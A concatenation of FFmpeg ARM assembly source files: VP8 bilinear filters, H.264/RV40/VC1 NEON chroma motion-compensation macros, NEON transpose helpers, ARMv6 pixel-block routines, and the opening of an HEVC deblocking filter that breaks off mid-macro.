add lr, lr, r12, lsl #2 @ select filter row
ldm lr, {r5, r6} @ filter tap pairs
str r3, [sp, #48] @ save src_stride (r3 is reused)
1:
ldr lr, [r2, r3, lsl #1]
ldr r12, [r2, r3]
ldr_nreg r7, r2, r3
ldr r11, [r2], #4
uxtb16 r8, lr, ror #8 @ src[3 + s*3] | src[1 + s*3]
uxtb16 r9, r12, ror #8 @ src[3 + s*2] | src[1 + s*2]
uxtb16 r3, r7, ror #8 @ src[3 + s*0] | src[1 + s*0]
uxtb16 r1, r11, ror #8 @ src[3 + s*1] | src[1 + s*1]
uxtb16 lr, lr @ src[2 + s*3] | src[0 + s*3]
uxtb16 r12, r12 @ src[2 + s*2] | src[0 + s*2]
uxtb16 r7, r7 @ src[2 + s*0] | src[0 + s*0]
uxtb16 r11, r11 @ src[2 + s*1] | src[0 + s*1]
pkhbt r10, r1, r8, lsl #16 @ src[1 + s*3] | src[1 + s*1]
pkhtb r1, r8, r1, asr #16 @ src[3 + s*3] | src[3 + s*1]
pkhbt r8, r3, r9, lsl #16 @ src[1 + s*2] | src[1 + s*0]
pkhtb r3, r9, r3, asr #16 @ src[3 + s*2] | src[3 + s*0]
pkhbt r9, r11, lr, lsl #16 @ src[0 + s*3] | src[0 + s*1]
pkhtb r11, lr, r11, asr #16 @ src[2 + s*3] | src[2 + s*1]
pkhbt lr, r7, r12, lsl #16 @ src[0 + s*2] | src[0 + s*0]
pkhtb r7, r12, r7, asr #16 @ src[2 + s*2] | src[2 + s*0]
mov r12, #0x40 @ rounding bias
smlad r9, r9, r6, r12 @ filter[0][1]
smlad r10, r10, r6, r12 @ filter[1][1]
smlad r11, r11, r6, r12 @ filter[2][1]
smlad r1, r1, r6, r12 @ filter[3][1]
smlad r9, lr, r5, r9 @ filter[0][0]
smlad r10, r8, r5, r10 @ filter[1][0]
smlad r11, r7, r5, r11 @ filter[2][0]
smlad r1, r3, r5, r1 @ filter[3][0]
subs r4, r4, #4
ldr r3, [sp, #48] @ restore stride
sat4 r9, r10, r11, r1
str r9, [r0], #4
bne 1b
ldr r4, [sp, #40] @ width
ldr r12, [sp, #44] @ height
add r2, r2, r3 @ advance src one line
ldr r9, [sp, #0]
subs r12, r12, #1
sub r2, r2, r4 @ rewind to line start
str r12, [sp, #44]
add r0, r0, r9
bne 1b
pop {r1, r4-r11, pc}
endfunc
@ Horizontal bilinear filter. r12 = mx; r5 is packed as
@ (mx << 16) | (8 - mx) for smlad. 4 output pixels per iteration;
@ result = (a*(8-mx) + b*mx + 4) >> 3. Same internal convention
@ as the epel functions.
function vp8_put_bilin_h_armv6
push {r1, r4-r11, lr}
bl_put_bilin_h_armv6:
rsb r5, r12, r12, lsl #16 @ (mx<<16) - mx
ldr r12, [sp, #44] @ height
sub r3, r3, r4 @ src line advance
add r5, r5, #8 @ low half = 8 - mx
1:
ldrb r6, [r2], #1
ldrb r7, [r2], #1
ldrb r8, [r2], #1
ldrb r9, [r2], #1
ldrb lr, [r2]
pkhbt r6, r6, r7, lsl #16 @ src[1] | src[0]
pkhbt r7, r7, r8, lsl #16 @ src[2] | src[1]
pkhbt r8, r8, r9, lsl #16 @ src[3] | src[2]
pkhbt r9, r9, lr, lsl #16 @ src[4] | src[3]
mov r10, #4 @ rounding bias
smlad r6, r6, r5, r10
smlad r7, r7, r5, r10
smlad r8, r8, r5, r10
smlad r9, r9, r5, r10
subs r4, r4, #4
asr r6, #3
asr r7, #3
pkhbt r6, r6, r8, lsl #13 @ pack, lsl #13 = (<<16) >> 3
pkhbt r7, r7, r9, lsl #13
orr r6, r6, r7, lsl #8
str r6, [r0], #4
bne 1b
ldr r4, [sp, #40] @ reload width
subs r12, r12, #1
add r2, r2, r3
add r0, r0, r1
bne 1b
pop {r1, r4-r11, pc}
endfunc
@ Vertical bilinear filter. r12 = my; r5 packed as
@ (my << 16) | (8 - my). 4 output pixels per iteration from two
@ source rows. Same internal convention as the epel functions.
function vp8_put_bilin_v_armv6
push {r1, r4-r11, lr}
bl_put_bilin_v_armv6:
rsb r5, r12, r12, lsl #16 @ (my<<16) - my
ldr r12, [sp, #44] @ height
add r5, r5, #8 @ low half = 8 - my
1:
ldrb r10, [r2, r3] @ next-row pixels
ldrb r6, [r2], #1
ldrb r11, [r2, r3]
ldrb r7, [r2], #1
ldrb lr, [r2, r3]
ldrb r8, [r2], #1
ldrb r9, [r2, r3]
pkhbt r6, r6, r10, lsl #16 @ below | above pairs
ldrb r10, [r2], #1
pkhbt r7, r7, r11, lsl #16
pkhbt r8, r8, lr, lsl #16
pkhbt r9, r10, r9, lsl #16
mov r10, #4 @ rounding bias
smlad r6, r6, r5, r10
smlad r7, r7, r5, r10
smlad r8, r8, r5, r10
smlad r9, r9, r5, r10
subs r4, r4, #4
asr r6, #3
asr r7, #3
pkhbt r6, r6, r8, lsl #13 @ pack, lsl #13 = (<<16) >> 3
pkhbt r7, r7, r9, lsl #13
orr r6, r6, r7, lsl #8
str r6, [r0], #4
bne 1b
ldr r4, [sp, #40] @ reload width
subs r12, r12, #1
add r2, r2, r3
add r0, r0, r1
sub r2, r2, r4 @ rewind to line start
bne 1b
pop {r1, r4-r11, pc}
endfunc
|
Akagi201/ffmpeg-xcode
| 14,259
|
ffmpeg-3.0.2/libavcodec/arm/h264cmc_neon.S
|
/*
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
/* chroma_mc8(uint8_t *dst, uint8_t *src, int stride, int h, int x, int y) */
@ Emit an 8x8 chroma MC function for \type (put/avg) and \codec
@ (h264/rv40/vc1). Computes the bilinear weights A/B/C/D from x/y,
@ then dispatches: full 2-D filter (x && y), vertical only (x == 0),
@ horizontal only (y == 0), or plain copy. h264 rounds with
@ vrshrn; rv40/vc1 add a bias (q11) before a truncating shift.
.macro h264_chroma_mc8 type, codec=h264
function ff_\type\()_\codec\()_chroma_mc8_neon, export=1
push {r4-r7, lr}
ldrd r4, r5, [sp, #20] @ r4 = x, r5 = y
.ifc \type,avg
mov lr, r0 @ keep dst for the averaging loads
.endif
pld [r1]
pld [r1, r2]
.ifc \codec,rv40
movrel r6, rv40bias
lsr r7, r5, #1
add r6, r6, r7, lsl #3
lsr r7, r4, #1
add r6, r6, r7, lsl #1
vld1.16 {d22[],d23[]}, [r6,:16] @ per-position rounding bias
.endif
.ifc \codec,vc1
vmov.u16 q11, #28
.endif
A muls r7, r4, r5 @ D = x*y (sets Z for the beq below)
T mul r7, r4, r5
T cmp r7, #0
rsb r6, r7, r5, lsl #3 @ C = 8*y - x*y
rsb r12, r7, r4, lsl #3 @ B = 8*x - x*y
sub r4, r7, r4, lsl #3
sub r4, r4, r5, lsl #3
add r4, r4, #64 @ A = 64 - 8*x - 8*y + x*y
beq 2f @ x == 0 or y == 0
vdup.8 d0, r4
vdup.8 d1, r12
vld1.8 {d4, d5}, [r1], r2
vdup.8 d2, r6
vdup.8 d3, r7
vext.8 d5, d4, d5, #1 @ d5 = row shifted left by 1
1: vld1.8 {d6, d7}, [r1], r2
vmull.u8 q8, d4, d0
vmlal.u8 q8, d5, d1
vext.8 d7, d6, d7, #1
vld1.8 {d4, d5}, [r1], r2
vmlal.u8 q8, d6, d2
pld [r1]
vext.8 d5, d4, d5, #1
vmlal.u8 q8, d7, d3
vmull.u8 q9, d6, d0
subs r3, r3, #2 @ two rows per iteration
vmlal.u8 q9, d7, d1
vmlal.u8 q9, d4, d2
vmlal.u8 q9, d5, d3
pld [r1, r2]
.ifc \codec,h264
vrshrn.u16 d16, q8, #6
vrshrn.u16 d17, q9, #6
.else
vadd.u16 q8, q8, q11
vadd.u16 q9, q9, q11
vshrn.u16 d16, q8, #6
vshrn.u16 d17, q9, #6
.endif
.ifc \type,avg
vld1.8 {d20}, [lr,:64], r2
vld1.8 {d21}, [lr,:64], r2
vrhadd.u8 q8, q8, q10 @ average with existing dst
.endif
vst1.8 {d16}, [r0,:64], r2
vst1.8 {d17}, [r0,:64], r2
bgt 1b
pop {r4-r7, pc}
2: adds r12, r12, r6 @ B + C: zero iff x == 0 && y == 0
vdup.8 d0, r4
beq 5f @ plain copy
tst r6, r6 @ C == 0 means horizontal only
vdup.8 d1, r12
beq 4f
vld1.8 {d4}, [r1], r2 @ vertical-only filter
3: vld1.8 {d6}, [r1], r2
vmull.u8 q8, d4, d0
vmlal.u8 q8, d6, d1
vld1.8 {d4}, [r1], r2
vmull.u8 q9, d6, d0
vmlal.u8 q9, d4, d1
pld [r1]
.ifc \codec,h264
vrshrn.u16 d16, q8, #6
vrshrn.u16 d17, q9, #6
.else
vadd.u16 q8, q8, q11
vadd.u16 q9, q9, q11
vshrn.u16 d16, q8, #6
vshrn.u16 d17, q9, #6
.endif
pld [r1, r2]
.ifc \type,avg
vld1.8 {d20}, [lr,:64], r2
vld1.8 {d21}, [lr,:64], r2
vrhadd.u8 q8, q8, q10
.endif
subs r3, r3, #2
vst1.8 {d16}, [r0,:64], r2
vst1.8 {d17}, [r0,:64], r2
bgt 3b
pop {r4-r7, pc}
4: vld1.8 {d4, d5}, [r1], r2 @ horizontal-only filter
vld1.8 {d6, d7}, [r1], r2
vext.8 d5, d4, d5, #1
vext.8 d7, d6, d7, #1
pld [r1]
subs r3, r3, #2
vmull.u8 q8, d4, d0
vmlal.u8 q8, d5, d1
vmull.u8 q9, d6, d0
vmlal.u8 q9, d7, d1
pld [r1, r2]
.ifc \codec,h264
vrshrn.u16 d16, q8, #6
vrshrn.u16 d17, q9, #6
.else
vadd.u16 q8, q8, q11
vadd.u16 q9, q9, q11
vshrn.u16 d16, q8, #6
vshrn.u16 d17, q9, #6
.endif
.ifc \type,avg
vld1.8 {d20}, [lr,:64], r2
vld1.8 {d21}, [lr,:64], r2
vrhadd.u8 q8, q8, q10
.endif
vst1.8 {d16}, [r0,:64], r2
vst1.8 {d17}, [r0,:64], r2
bgt 4b
pop {r4-r7, pc}
5: vld1.8 {d4}, [r1], r2 @ no filtering, weight A == 64
vld1.8 {d5}, [r1], r2
pld [r1]
subs r3, r3, #2
vmull.u8 q8, d4, d0
vmull.u8 q9, d5, d0
pld [r1, r2]
.ifc \codec,h264
vrshrn.u16 d16, q8, #6
vrshrn.u16 d17, q9, #6
.else
vadd.u16 q8, q8, q11
vadd.u16 q9, q9, q11
vshrn.u16 d16, q8, #6
vshrn.u16 d17, q9, #6
.endif
.ifc \type,avg
vld1.8 {d20}, [lr,:64], r2
vld1.8 {d21}, [lr,:64], r2
vrhadd.u8 q8, q8, q10
.endif
vst1.8 {d16}, [r0,:64], r2
vst1.8 {d17}, [r0,:64], r2
bgt 5b
pop {r4-r7, pc}
endfunc
.endm
/* chroma_mc4(uint8_t *dst, uint8_t *src, int stride, int h, int x, int y) */
@ Emit a 4xN chroma MC function for \type/\codec. Same weight setup
@ and case split as h264_chroma_mc8, but two 4-pixel rows are packed
@ into one d register (vtrn.32) so both rows are filtered per multiply.
.macro h264_chroma_mc4 type, codec=h264
function ff_\type\()_\codec\()_chroma_mc4_neon, export=1
push {r4-r7, lr}
ldrd r4, r5, [sp, #20] @ r4 = x, r5 = y
.ifc \type,avg
mov lr, r0
.endif
pld [r1]
pld [r1, r2]
.ifc \codec,rv40
movrel r6, rv40bias
lsr r7, r5, #1
add r6, r6, r7, lsl #3
lsr r7, r4, #1
add r6, r6, r7, lsl #1
vld1.16 {d22[],d23[]}, [r6,:16]
.endif
.ifc \codec,vc1
vmov.u16 q11, #28
.endif
A muls r7, r4, r5 @ D = x*y
T mul r7, r4, r5
T cmp r7, #0
rsb r6, r7, r5, lsl #3 @ C
rsb r12, r7, r4, lsl #3 @ B
sub r4, r7, r4, lsl #3
sub r4, r4, r5, lsl #3
add r4, r4, #64 @ A
beq 2f
vdup.8 d0, r4
vdup.8 d1, r12
vld1.8 {d4}, [r1], r2
vdup.8 d2, r6
vdup.8 d3, r7
vext.8 d5, d4, d5, #1
vtrn.32 d4, d5 @ pack row | shifted row
vtrn.32 d0, d1 @ pack weights to match
vtrn.32 d2, d3
1: vld1.8 {d6}, [r1], r2
vext.8 d7, d6, d7, #1
vtrn.32 d6, d7
vmull.u8 q8, d4, d0
vmlal.u8 q8, d6, d2
vld1.8 {d4}, [r1], r2
vext.8 d5, d4, d5, #1
vtrn.32 d4, d5
pld [r1]
vmull.u8 q9, d6, d0
vmlal.u8 q9, d4, d2
vadd.i16 d16, d16, d17 @ combine the two packed halves
vadd.i16 d17, d18, d19
.ifc \codec,h264
vrshrn.u16 d16, q8, #6
.else
vadd.u16 q8, q8, q11
vshrn.u16 d16, q8, #6
.endif
subs r3, r3, #2
pld [r1, r2]
.ifc \type,avg
vld1.32 {d20[0]}, [lr,:32], r2
vld1.32 {d20[1]}, [lr,:32], r2
vrhadd.u8 d16, d16, d20
.endif
vst1.32 {d16[0]}, [r0,:32], r2
vst1.32 {d16[1]}, [r0,:32], r2
bgt 1b
pop {r4-r7, pc}
2: adds r12, r12, r6 @ B + C
vdup.8 d0, r4
beq 5f
tst r6, r6
vdup.8 d1, r12
vtrn.32 d0, d1
beq 4f
vext.32 d1, d0, d1, #1 @ vertical-only filter
vld1.32 {d4[0]}, [r1], r2
3: vld1.32 {d4[1]}, [r1], r2
vmull.u8 q8, d4, d0
vld1.32 {d4[0]}, [r1], r2
vmull.u8 q9, d4, d1
vadd.i16 d16, d16, d17
vadd.i16 d17, d18, d19
pld [r1]
.ifc \codec,h264
vrshrn.u16 d16, q8, #6
.else
vadd.u16 q8, q8, q11
vshrn.u16 d16, q8, #6
.endif
.ifc \type,avg
vld1.32 {d20[0]}, [lr,:32], r2
vld1.32 {d20[1]}, [lr,:32], r2
vrhadd.u8 d16, d16, d20
.endif
subs r3, r3, #2
pld [r1, r2]
vst1.32 {d16[0]}, [r0,:32], r2
vst1.32 {d16[1]}, [r0,:32], r2
bgt 3b
pop {r4-r7, pc}
4: vld1.8 {d4}, [r1], r2 @ horizontal-only filter
vld1.8 {d6}, [r1], r2
vext.8 d5, d4, d5, #1
vext.8 d7, d6, d7, #1
vtrn.32 d4, d5
vtrn.32 d6, d7
vmull.u8 q8, d4, d0
vmull.u8 q9, d6, d0
subs r3, r3, #2
vadd.i16 d16, d16, d17
vadd.i16 d17, d18, d19
pld [r1]
.ifc \codec,h264
vrshrn.u16 d16, q8, #6
.else
vadd.u16 q8, q8, q11
vshrn.u16 d16, q8, #6
.endif
.ifc \type,avg
vld1.32 {d20[0]}, [lr,:32], r2
vld1.32 {d20[1]}, [lr,:32], r2
vrhadd.u8 d16, d16, d20
.endif
pld [r1]
vst1.32 {d16[0]}, [r0,:32], r2
vst1.32 {d16[1]}, [r0,:32], r2
bgt 4b
pop {r4-r7, pc}
5: vld1.32 {d4[0]}, [r1], r2 @ no filtering, weight A == 64
vld1.32 {d4[1]}, [r1], r2
vmull.u8 q8, d4, d0
subs r3, r3, #2
pld [r1]
.ifc \codec,h264
vrshrn.u16 d16, q8, #6
.else
vadd.u16 q8, q8, q11
vshrn.u16 d16, q8, #6
.endif
.ifc \type,avg
vld1.32 {d20[0]}, [lr,:32], r2
vld1.32 {d20[1]}, [lr,:32], r2
vrhadd.u8 d16, d16, d20
.endif
pld [r1]
vst1.32 {d16[0]}, [r0,:32], r2
vst1.32 {d16[1]}, [r0,:32], r2
bgt 5b
pop {r4-r7, pc}
endfunc
.endm
@ Emit a 2xN H.264 chroma MC function for \type (put/avg). When both
@ x and y are zero the pixels are copied (or averaged) directly;
@ otherwise two rows are filtered at once with packed weights.
.macro h264_chroma_mc2 type
function ff_\type\()_h264_chroma_mc2_neon, export=1
push {r4-r6, lr}
ldr r4, [sp, #16] @ x
ldr lr, [sp, #20] @ y
pld [r1]
pld [r1, r2]
orrs r5, r4, lr @ x == 0 && y == 0?
beq 2f
mul r5, r4, lr @ D = x*y
rsb r6, r5, lr, lsl #3 @ C
rsb r12, r5, r4, lsl #3 @ B
sub r4, r5, r4, lsl #3
sub r4, r4, lr, lsl #3
add r4, r4, #64 @ A
vdup.8 d0, r4
vdup.8 d2, r12
vdup.8 d1, r6
vdup.8 d3, r5
vtrn.16 q0, q1 @ interleave weights for paired rows
1:
vld1.32 {d4[0]}, [r1], r2
vld1.32 {d4[1]}, [r1], r2
vrev64.32 d5, d4
vld1.32 {d5[1]}, [r1]
vext.8 q3, q2, q2, #1 @ shifted copies
vtrn.16 q2, q3
vmull.u8 q8, d4, d0
vmlal.u8 q8, d5, d1
.ifc \type,avg
vld1.16 {d18[0]}, [r0,:16], r2
vld1.16 {d18[1]}, [r0,:16]
sub r0, r0, r2
.endif
vtrn.32 d16, d17
vadd.i16 d16, d16, d17
vrshrn.u16 d16, q8, #6
.ifc \type,avg
vrhadd.u8 d16, d16, d18
.endif
vst1.16 {d16[0]}, [r0,:16], r2
vst1.16 {d16[1]}, [r0,:16], r2
subs r3, r3, #2
bgt 1b
pop {r4-r6, pc}
2:
.ifc \type,put
ldrh_post r5, r1, r2 @ straight 2-byte copy
strh_post r5, r0, r2
ldrh_post r6, r1, r2
strh_post r6, r0, r2
.else
vld1.16 {d16[0]}, [r1], r2
vld1.16 {d16[1]}, [r1], r2
vld1.16 {d18[0]}, [r0,:16], r2
vld1.16 {d18[1]}, [r0,:16]
sub r0, r0, r2
vrhadd.u8 d16, d16, d18 @ average with dst
vst1.16 {d16[0]}, [r0,:16], r2
vst1.16 {d16[1]}, [r0,:16], r2
.endif
subs r3, r3, #2
bgt 2b
pop {r4-r6, pc}
endfunc
.endm
h264_chroma_mc8 put
h264_chroma_mc8 avg
h264_chroma_mc4 put
h264_chroma_mc4 avg
h264_chroma_mc2 put
h264_chroma_mc2 avg
#if CONFIG_RV40_DECODER
@ RV40 per-subpel-position rounding bias table, indexed by (y/2, x/2)
@ in the chroma MC macros above.
const rv40bias
.short 0, 16, 32, 16
.short 32, 28, 32, 28
.short 0, 32, 16, 32
.short 32, 28, 32, 28
endconst
h264_chroma_mc8 put, rv40
h264_chroma_mc8 avg, rv40
h264_chroma_mc4 put, rv40
h264_chroma_mc4 avg, rv40
#endif
#if CONFIG_VC1_DECODER
h264_chroma_mc8 put, vc1
h264_chroma_mc8 avg, vc1
h264_chroma_mc4 put, vc1
h264_chroma_mc4 avg, vc1
#endif
|
Akagi201/ffmpeg-xcode
| 1,975
|
ffmpeg-3.0.2/libavcodec/arm/neon.S
|
/*
* Copyright (c) 2008 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
@ Transpose an 8x8 byte matrix held in eight d registers (one row
@ each) using three rounds of vtrn at decreasing element widths.
.macro transpose_8x8 r0, r1, r2, r3, r4, r5, r6, r7
vtrn.32 \r0, \r4
vtrn.32 \r1, \r5
vtrn.32 \r2, \r6
vtrn.32 \r3, \r7
vtrn.16 \r0, \r2
vtrn.16 \r1, \r3
vtrn.16 \r4, \r6
vtrn.16 \r5, \r7
vtrn.8 \r0, \r1
vtrn.8 \r2, \r3
vtrn.8 \r4, \r5
vtrn.8 \r6, \r7
.endm
@ Transpose a 4x4 byte matrix held in four registers (one row each).
.macro transpose_4x4 r0, r1, r2, r3
vtrn.16 \r0, \r2
vtrn.16 \r1, \r3
vtrn.8 \r0, \r1
vtrn.8 \r2, \r3
.endm
@ Pairwise swap of two groups of four registers.
.macro swap4 r0, r1, r2, r3, r4, r5, r6, r7
vswp \r0, \r4
vswp \r1, \r5
vswp \r2, \r6
vswp \r3, \r7
.endm
@ Transpose two 4x4 matrices of 16-bit elements held in eight
@ registers (rows 0-3 and 4-7 form the two matrices).
.macro transpose16_4x4 r0, r1, r2, r3, r4, r5, r6, r7
vtrn.32 \r0, \r2
vtrn.32 \r1, \r3
vtrn.32 \r4, \r6
vtrn.32 \r5, \r7
vtrn.16 \r0, \r1
vtrn.16 \r2, \r3
vtrn.16 \r4, \r5
vtrn.16 \r6, \r7
.endm
|
Akagi201/ffmpeg-xcode
| 2,665
|
ffmpeg-3.0.2/libavcodec/arm/pixblockdsp_armv6.S
|
/*
* Copyright (c) 2009 Mans Rullgard <mans@mansr.com>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
@ Widen an 8x8 block of u8 pixels (r1, line size r2) to 8x8 int16
@ at r0, one row per iteration, using uxtb16 + pkh repacking.
function ff_get_pixels_armv6, export=1
pld [r1, r2]
push {r4-r8, lr}
mov lr, #8 @ 8 rows
1:
ldrd_post r4, r5, r1, r2 @ 8 pixels of one row
subs lr, lr, #1
uxtb16 r6, r4 @ bytes 2,0 -> halfwords
uxtb16 r4, r4, ror #8 @ bytes 3,1 -> halfwords
uxtb16 r12, r5
uxtb16 r8, r5, ror #8
pld [r1, r2]
pkhbt r5, r6, r4, lsl #16 @ restore original ordering
pkhtb r6, r4, r6, asr #16
pkhbt r7, r12, r8, lsl #16
pkhtb r12, r8, r12, asr #16
stm r0!, {r5,r6,r7,r12} @ 8 int16 out
bgt 1b
pop {r4-r8, pc}
endfunc
@ Store the per-pixel difference of two 8x8 u8 blocks (r1 - r2,
@ line size r3) as 8x8 int16 at r0, one row per iteration.
function ff_diff_pixels_armv6, export=1
pld [r1, r3]
pld [r2, r3]
push {r4-r9, lr}
mov lr, #8 @ 8 rows
1:
ldrd_post r4, r5, r1, r3 @ row of block 1
ldrd_post r6, r7, r2, r3 @ row of block 2
uxtb16 r8, r4
uxtb16 r4, r4, ror #8
uxtb16 r9, r6
uxtb16 r6, r6, ror #8
pld [r1, r3]
ssub16 r9, r8, r9 @ even-lane differences
ssub16 r6, r4, r6 @ odd-lane differences
uxtb16 r8, r5
uxtb16 r5, r5, ror #8
pld [r2, r3]
pkhbt r4, r9, r6, lsl #16 @ re-interleave
pkhtb r6, r6, r9, asr #16
uxtb16 r9, r7
uxtb16 r7, r7, ror #8
ssub16 r9, r8, r9
ssub16 r5, r5, r7
subs lr, lr, #1
pkhbt r8, r9, r5, lsl #16
pkhtb r9, r5, r9, asr #16
stm r0!, {r4,r6,r8,r9} @ 8 int16 differences out
bgt 1b
pop {r4-r9, pc}
endfunc
|
Akagi201/ffmpeg-xcode
| 10,346
|
ffmpeg-3.0.2/libavcodec/arm/hevcdsp_deblock_neon.S
|
/*
* Copyright (c) 2014 Seppo Tomperi <seppo.tomperi@vtt.fi>
*
* This file is part of FFmpeg.
*
* FFmpeg is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* FFmpeg is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with FFmpeg; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*/
#include "libavutil/arm/asm.S"
#include "neon.S"
@ Load the two chroma tc thresholds from the int32 array at r2 into
@ r12 (tc[0]) and r3 (tc[1]). If their sum is zero the filter is a
@ no-op, so return straight to the macro user's caller (bxeq lr).
@ NOTE(review): the sum==0 test assumes both tc values are non-negative
@ (true for HEVC tc values) — confirm against the caller.
.macro hevc_loop_filter_chroma_start
ldr r12, [r2] @ tc[0]
ldr r3, [r2, #4] @ tc[1]
add r2, r3, r12 @ tc[0] + tc[1]
cmp r2, #0
it eq
bxeq lr @ both zero -> nothing to filter
.endm
@ Chroma deblocking core for 8 pixels across the edge.
@ In:  d18 = p1 row, d2 = p0 row, d4 = q0 row, d19 = q1 row (u8)
@      r12 = tc for the first 4 pixels, r3 = tc for the last 4
@ Out: d2 = filtered p0, d4 = filtered q0 (saturated back to u8)
@ Computes delta = rnd((4*(q0-p0) + (p1-q1)) >> 3) clamped to [-tc, tc],
@ then p0 += delta, q0 -= delta.
.macro hevc_loop_filter_chroma_body
vsubl.u8 q3, d4, d2 @ q0 - p0 (widened to s16)
vsubl.u8 q11, d18, d19 @ p1 - q1
vshl.i16 q3, #2 @ 4*(q0-p0)
vadd.i16 q11, q3 @ 4*(q0-p0) + (p1-q1)
vdup.16 d0, r12 @ q0 = {tc0 x4, tc1 x4}
vdup.16 d1, r3
vrshr.s16 q11, q11, #3 @ rounded >> 3 -> delta
vneg.s16 q12, q0 @ -tc
vmovl.u8 q2, d4 @ widen q0 row
vmin.s16 q11, q11, q0 @ clamp delta to [-tc, tc]
vmax.s16 q11, q11, q12
vaddw.u8 q1, q11, d2 @ p0 + delta
vsub.i16 q2, q11 @ q0 - delta
vqmovun.s16 d2, q1 @ saturate back to u8
vqmovun.s16 d4, q2
.endm
@ Load the two luma tc thresholds from the int32 array at r3 into
@ r12 (tc[0]) and r3 (tc[1]). The two halfwords are packed into r3
@ just to test them for zero in one compare; if both are zero the
@ filter is a no-op and we return to the macro user's caller.
@ On fall-through r3 is restored to tc[1].
.macro hevc_loop_filter_luma_start
ldr r12, [r3] @ tc[0]
ldr r3, [r3, #4] @ tc[1]
lsl r3, #16
orr r3, r12 @ pack tc1:tc0 for a single zero test
cmp r3, #0
it eq
bxeq lr @ both zero -> nothing to filter
lsr r3, #16 @ restore r3 = tc[1]
.endm
@ Luma deblocking core for 8 pixels across a vertical or horizontal edge.
@ In:  d16..d30 (even d regs) = rows p3,p2,p1,p0,q0,q1,q2,q3 as u8
@      r2 = beta, r12 = tc[0], r3 = tc[1]
@ Out: rows written back (saturated to u8) into the same d registers.
@ Clobbers r5-r9, q0-q7 and the row registers; requires d8-d15 saved by
@ the caller. Per the HEVC deblocking algorithm it derives dp0/dq0-style
@ activity measures, picks strong or weak filtering per 4-pixel segment,
@ and branches to the external label "bypasswrite" (defined in
@ ff_hevc_h_loop_filter_luma_neon) when no segment needs filtering.
.macro hevc_loop_filter_luma_body
@ -- widen all eight rows to s16 --
vmovl.u8 q8, d16
vmovl.u8 q9, d18
vmovl.u8 q10, d20
vmovl.u8 q11, d22
vmovl.u8 q12, d24
vmovl.u8 q13, d26
vmovl.u8 q14, d28
vmovl.u8 q15, d30
@ -- second-derivative activity: |p2 - 2*p1 + p0| and |q2 - 2*q1 + q0| --
vadd.i16 q7, q9, q11
vadd.i16 q6, q14, q12
vsub.i16 q7, q10
vsub.i16 q6, q13
vabd.s16 q7, q7, q10
vabd.s16 q6, q6, q13
vdup.16 q0, r2 @ q0 = beta in every lane
vmov q4, q7
vmov q5, q6
vdup.16 d4, r12 @ d4 = tc[0]
@ -- shuffle so each 64-bit half holds the per-segment dp/dq sums --
vtrn.16 q7, q4
vtrn.16 q6, q5
vshl.u64 q7, #32
vshr.u64 q4, #32
vshl.u64 q6, #32
vshr.u64 q5, #32
vshr.u64 q7, #32
vshr.u64 q6, #32
vshl.u64 q5, #32
vshl.u64 q4, #32
vorr q6, q5
vorr q7, q4
vdup.16 d5, r3 @ d5 = tc[1]
vadd.i16 q5, q7, q6
@ -- filter on/off decision per 4-pixel segment: d < beta --
vmov q4, q5
vmov q3, q5
vtrn.32 q3, q4
vadd.i16 q4, q3
vshl.s16 q5, q5, #1
vcgt.s16 q3, q0, q4
vmovn.i16 d6, q3
vshr.s16 q1, q0, #2 @ beta >> 2 (strong-filter threshold)
vmovn.i16 d6, q3 @ NOTE(review): duplicate of the vmovn 2 lines up — kept verbatim, appears redundant
vcgt.s16 q5, q1, q5
vmov r7, s12 @ r7 = packed on/off mask
cmp r7, #0
beq bypasswrite @ nothing to filter -> shared epilogue
@ -- strong/weak decision (flatness + gradient vs beta>>3, tc checks) --
vpadd.i32 d0, d14, d12
vpadd.i32 d1, d15, d13
vmov q4, q2
vshl.s16 q2, #2
vshr.s16 q1, q1, #1
vrhadd.s16 q2, q4 @ (tc*5 + 1) >> 1 threshold
vabd.s16 q7, q8, q11 @ |p3 - p0|
vaba.s16 q7, q15, q12 @ + |q3 - q0|
vmovn.i32 d0, q0
vmov r5, r6, s0, s1 @ per-segment dp/dq sums for weak filter
vcgt.s16 q6, q1, q7
vand q5, q5, q6
vabd.s16 q7, q11, q12 @ |p0 - q0|
vcgt.s16 q6, q2, q7
vand q5, q5, q6
@ -- spread the strong-filter mask across both segment halves --
